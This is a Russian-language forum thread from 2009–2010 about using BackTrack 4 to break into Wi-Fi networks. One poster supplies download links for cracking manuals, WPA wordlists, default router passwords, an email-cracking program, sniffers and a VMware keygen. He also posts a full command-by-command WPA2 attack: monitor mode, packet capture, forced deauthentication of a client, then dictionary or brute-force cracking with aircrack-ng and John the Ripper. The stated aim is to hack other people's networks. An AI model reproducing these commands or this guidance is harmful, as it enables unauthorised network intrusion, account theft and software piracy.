Форум camel-shoes.ru
18 Декабря 2010, 22:32:08 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: SMF форум только что установлен!
 
  camel-shoes.ru   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1]
  Печать  
Автор Тема: учимся работать BackTrack 4 Pre Release  (Прочитано 3539 раз)
Alex13
Новичок
*
Сообщений: 8


Просмотр профиля
« : 15 Сентября 2009, 17:39:22 »

Уважаемые господа ! есть у кого мануал на русском ? или где форум толковый ?

сложно первый раз самому разобраться......
Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #1 : 13 Июня 2010, 22:33:56 »

последуйте моему мануалу http://turbobit.net/rsg4k4bd39hq.html через недельку тренировки 10 минут и сеть взломана.

инсрукция по взлому WPA на русском с картинками. http://turbobit.net/9p0z7qbqrfmg.html


вот пароли на роутеры и модемы по умолчанию + список wi-fiкарт работающих под windows если вашей карты там нет то и не стоит пыжиться взломать сеть + програмка для взлома почты(с описанием что и как). http://turbobit.net/fb9ex7ipvgin.htm

вот словарь из цифр у кого пароль дата рождения то она там есть распаковывайте архив 7zip.http://turbobit.net/0ua50a6juoyp.html

вот словари WPA http://turbobit.net/2pfa5dwycqnz.html

вот хэши для взлома linksys,Thomson http://turbobit.net/d1qut655vtnk.html


new вот видео как снифать трафик с помощью wireshark и расшифровывать с airdecap-ng
и как работать c cowpatty для взлома WPA. http://turbobit.net/c2zex78gi0cn.html

вот сниферы под виндоуз очень нужная вещь для взлома.
http://turbobit.net/fd1sknk84ucz.html


new вот ещё програмка для мониторинга сетей Xirrus WiFi Inspector
http://turbobit.net/g36k27c50p6q.html


new програмки для создания словарей и rainbow tab.
http://turbobit.net/xbrnk4z379ht.html

вот пароли на роутеры и модемы по умолчанию + список wi-fiкарт работающих под windows если вашей карты там нет то и не стоит пыжиться взломать сеть + програмка для взлома почты(с описанием что и как). http://turbobit.net/fb9ex7ipvgin.html


Вот инсрукция по взлому WPA на русском с картинками. http://turbobit.net/9p0z7qbqrfmg.html



вот словарь из цифр у кого пароль дата рождения то она там есть распаковывайте архив 7zip.http://turbobit.net/0ua50a6juoyp.html

вот словари WPA http://turbobit.net/2pfa5dwycqnz.html

вот хэши для взлома linksys,Thomson http://turbobit.net/d1qut655vtnk.html


new вот видео как снифать трафик с помощью wireshark и расшифровывать с airdecap-ng
и как работать c cowpatty для взлома WPA. http://turbobit.net/c2zex78gi0cn.html

вот сниферы под виндоуз очень нужная вещь для взлома.
http://turbobit.net/fd1sknk84ucz.html


new вот ещё програмка для мониторинга сетей Xirrus WiFi Inspector
http://turbobit.net/g36k27c50p6q.html


new програмки для создания словарей и rainbow tab.
http://turbobit.net/xbrnk4z379ht.html

вот вам мой BackTrack4 на новом ядре kernel 2.6.34-rc6 поддерживает намного больше железа(аудио,видео,wifi карты и т.д.)кроме того руссифицирован. Установлены обновления по 12.05.2010.Установлен пользовательский доп.софт (мультимедиа,графика,фото).


http://depositfiles.com/files/zzdqriotx my backtrack4-.part01.rar 100.0 Mb
http://depositfiles.com/files/1v0oubhp7 my backtrack4-.part02.rar 100.0 Mb
http://depositfiles.com/files/wu092r1qm my backtrack4-.part03.rar 100.0 Mb
http://depositfiles.com/files/41uejbg2k my backtrack4-.part04.rar 100.0 Mb
http://depositfiles.com/files/kiv3m4mtx my backtrack4-.part05.rar 100.0 Mb
http://depositfiles.com/files/ihbio09e9 my backtrack4-.part06.rar 100.0 Mb
http://depositfiles.com/files/lq4gjexmc my backtrack4-.part07.rar 100.0 Mb
http://depositfiles.com/files/jl3gb1uz6 my backtrack4-.part08.rar 100.0 Mb
http://depositfiles.com/files/pv6w5amvp my backtrack4-.part09.rar 100.0 Mb
http://depositfiles.com/files/z1bk8v437 my backtrack4-.part10.rar 100.0 Mb
http://depositfiles.com/files/eozmn04dv my backtrack4-.part11.rar 100.0 Mb
http://depositfiles.com/files/rvl9y7egw my backtrack4-.part12.rar 100.0 Mb
http://depositfiles.com/files/v9reya52i my backtrack4-.part13.rar 100.0 Mb
http://depositfiles.com/files/okzhepzk3 my backtrack4-.part14.rar 100.0 Mb
http://depositfiles.com/files/jxlreqpbt my backtrack4-.part15.rar 100.0 Mb
http://depositfiles.com/files/w90pcrvje my backtrack4-.part16.rar 100.0 Mb
http://depositfiles.com/files/cmz45y712 my backtrack4-.part17.rar 100.0 Mb
http://depositfiles.com/files/u50w3x5rx my backtrack4-.part18.rar 100.0 Mb
http://depositfiles.com/files/u7nknwxn8 my backtrack4-.part19.rar 100.0 Mb
http://depositfiles.com/files/3eosdnb4z my backtrack4-.part20.rar 100.0 Mb
http://depositfiles.com/files/f12re1mum my backtrack4-.part21.rar 95.2 Mb

вот ещё сниферы под виндоуз и видео как снифать инфу с точек доступа ещё инструкции

как обходить защиту точек и как генерировать хэши для взлома WPA с помощью airolib-ng

http://turbobit.net/i56p24cgimiq.html


вот большой словарь для взлома WPA. рапаковывайте 7zip.часть1. http://turbobit.net/wuo3u8q91nbv.html

часть2. http://turbobit.net/hwhvmxft2sld.html

Видео уроки как и что можно взломать с помощью live-DVD BackTrack4.

часть1 http://turbobit.net/74zdscblhenj.html

часть2 http://turbobit.net/1dncxs3c0ptx.html

часть3 http://turbobit.net/n7x1f1aei3qf.html

часть4 http://turbobit.net/j0hfnuek4452.html

часть5 http://turbobit.net/ffr4aeyhl28l.html

часть6 http://turbobit.net/sfmr94toi4lt.html

часть7 http://turbobit.net/kpfne97bbhwh.html

часть8 http://turbobit.net/colru7u9sux1.html
Записан
aconst
Новичок
*
Сообщений: 6


Просмотр профиля
« Ответ #2 : 21 Июля 2010, 19:57:40 »

Здравствуйте. С  Linux раньше не сталкивался, пытаюсь разобраться и поэтому первые вопросы. К сожалению не работает первая же ссылка на мануал: http://turbobit.net/rsg4k4bd39hq.html. Есть и другие нерабочие  ссылки. Далее, при загрузке с исошника BackTrack4  требуется логин и пароль. Где их взять? Вот пока такие вопросы.  Непонимающий
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #3 : 23 Июля 2010, 19:33:36 »

Логин- root
Пароль- toor
Записан
aconst
Новичок
*
Сообщений: 6


Просмотр профиля
« Ответ #4 : 25 Июля 2010, 19:19:28 »

Спасибо, еще одна просьба, по возможности, переложить вот эти удалнные файлы: http://turbobit.net/rsg4k4bd39hq.html, http://turbobit.net/i56p24cgimiq.html. Всех с праздником!  Веселый
« Последнее редактирование: 25 Июля 2010, 19:41:18 от aconst » Записан
aconst
Новичок
*
Сообщений: 6


Просмотр профиля
« Ответ #5 : 05 Августа 2010, 12:28:05 »

Здравствуйте. Попалась здесь, одна софтина  "airdrop". К ней бы описание на русском, да интегрировать бы в "BackTrack 4". Вот ссылка на "Aircrack-ng 1.1", включащий Airdrop-ng  http://depositfiles.com/files/3ub7yxdrr с диска прилагающегося к журналу "Хакер" за август.
« Последнее редактирование: 05 Августа 2010, 14:50:38 от aconst » Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #6 : 27 Ноября 2010, 00:40:11 »

вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться.
Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я.   http://turbobit.net/quet9unne87z.html
да кто хочет  VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html
Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #7 : 27 Ноября 2010, 00:50:41 »

вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться .  http://turbobit.net/quet9unne87z.html
Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я.да кто хочет  VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html
Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #8 : 28 Ноября 2010, 00:22:52 »

взлом WPA.


Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.

Во-первых, поставить карту в режиме мониторинга:

...............................................................

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

...............................................................
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)
................................................................

Хорошо, теперь мы можем использовать интерфейс mon0

Давайте найдём беспроводную сеть, которая использует WPA2 / PSK

.................................................................

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                   

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                 

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

.....................................................................

Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск

.....................................................................

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

........................................................................


На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с)

.........................................................................

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

.............................................................................

Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу

..............................................................................

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                               

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                             

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

................................................................................


Остановитe airodump-ng и убедитесь, что файлы были созданы правильно

...............................................................................

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

................................................................................

 Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.

 Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt

................................................................................

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

--------------------------------------------------------------------------------

Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:

..................................................................................

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

.................................................................................

каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA


----------------------------------------------------------------------------------------------------------------
вот вам в помощь несколько словарей

ComboFile   http://turbobit.net/m15prul3v4vt.html

de-ice.net-1.110-1.0  http://turbobit.net/8jsypdjdkctf.html

de-ice.net-1.100-1.1  http://turbobit.net/ej38m25xhrmt.html

de-ice.net-2.100-1.1.part1  http://turbobit.net/0g2yjp1y77df.html

de-ice.net-2.100-1.1.part2  http://turbobit.net/7cbyz8sxarh7.html

роутеры и модемы Password List 2010-02-04  http://turbobit.net/fomdazyfg5ou.html

theargonlistver1  http://turbobit.net/kjf1h2eoyb46.html

webster-dictionary  http://turbobit.net/2xhh12xca0cy.html

wpalist  http://turbobit.net/700uk6nvpren.html





Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #9 : 14 Декабря 2010, 01:52:41 »

вот парочка генераторов ключей для сетей с essid wlan и speed touch(thomson livebox и т.д)по дефолту если владелец не сменил пароль на свой,генератор выдаёт два-три ключа,пробуйте каждый это зависит от производителя+словарь wpa rar125mb unrar1.87gb
польззоваться генератором просто где essid вводите названиее сети ,где bssid мак адресс жмёте calculate и появится список ключей(всё работает из под windows)
http://turbobit.net/w0gco2aoi4yb.html
Записан
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQLPowered by PHP Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC
Valid XHTML 1.0!Valid CSS!
Яндекс.Метрика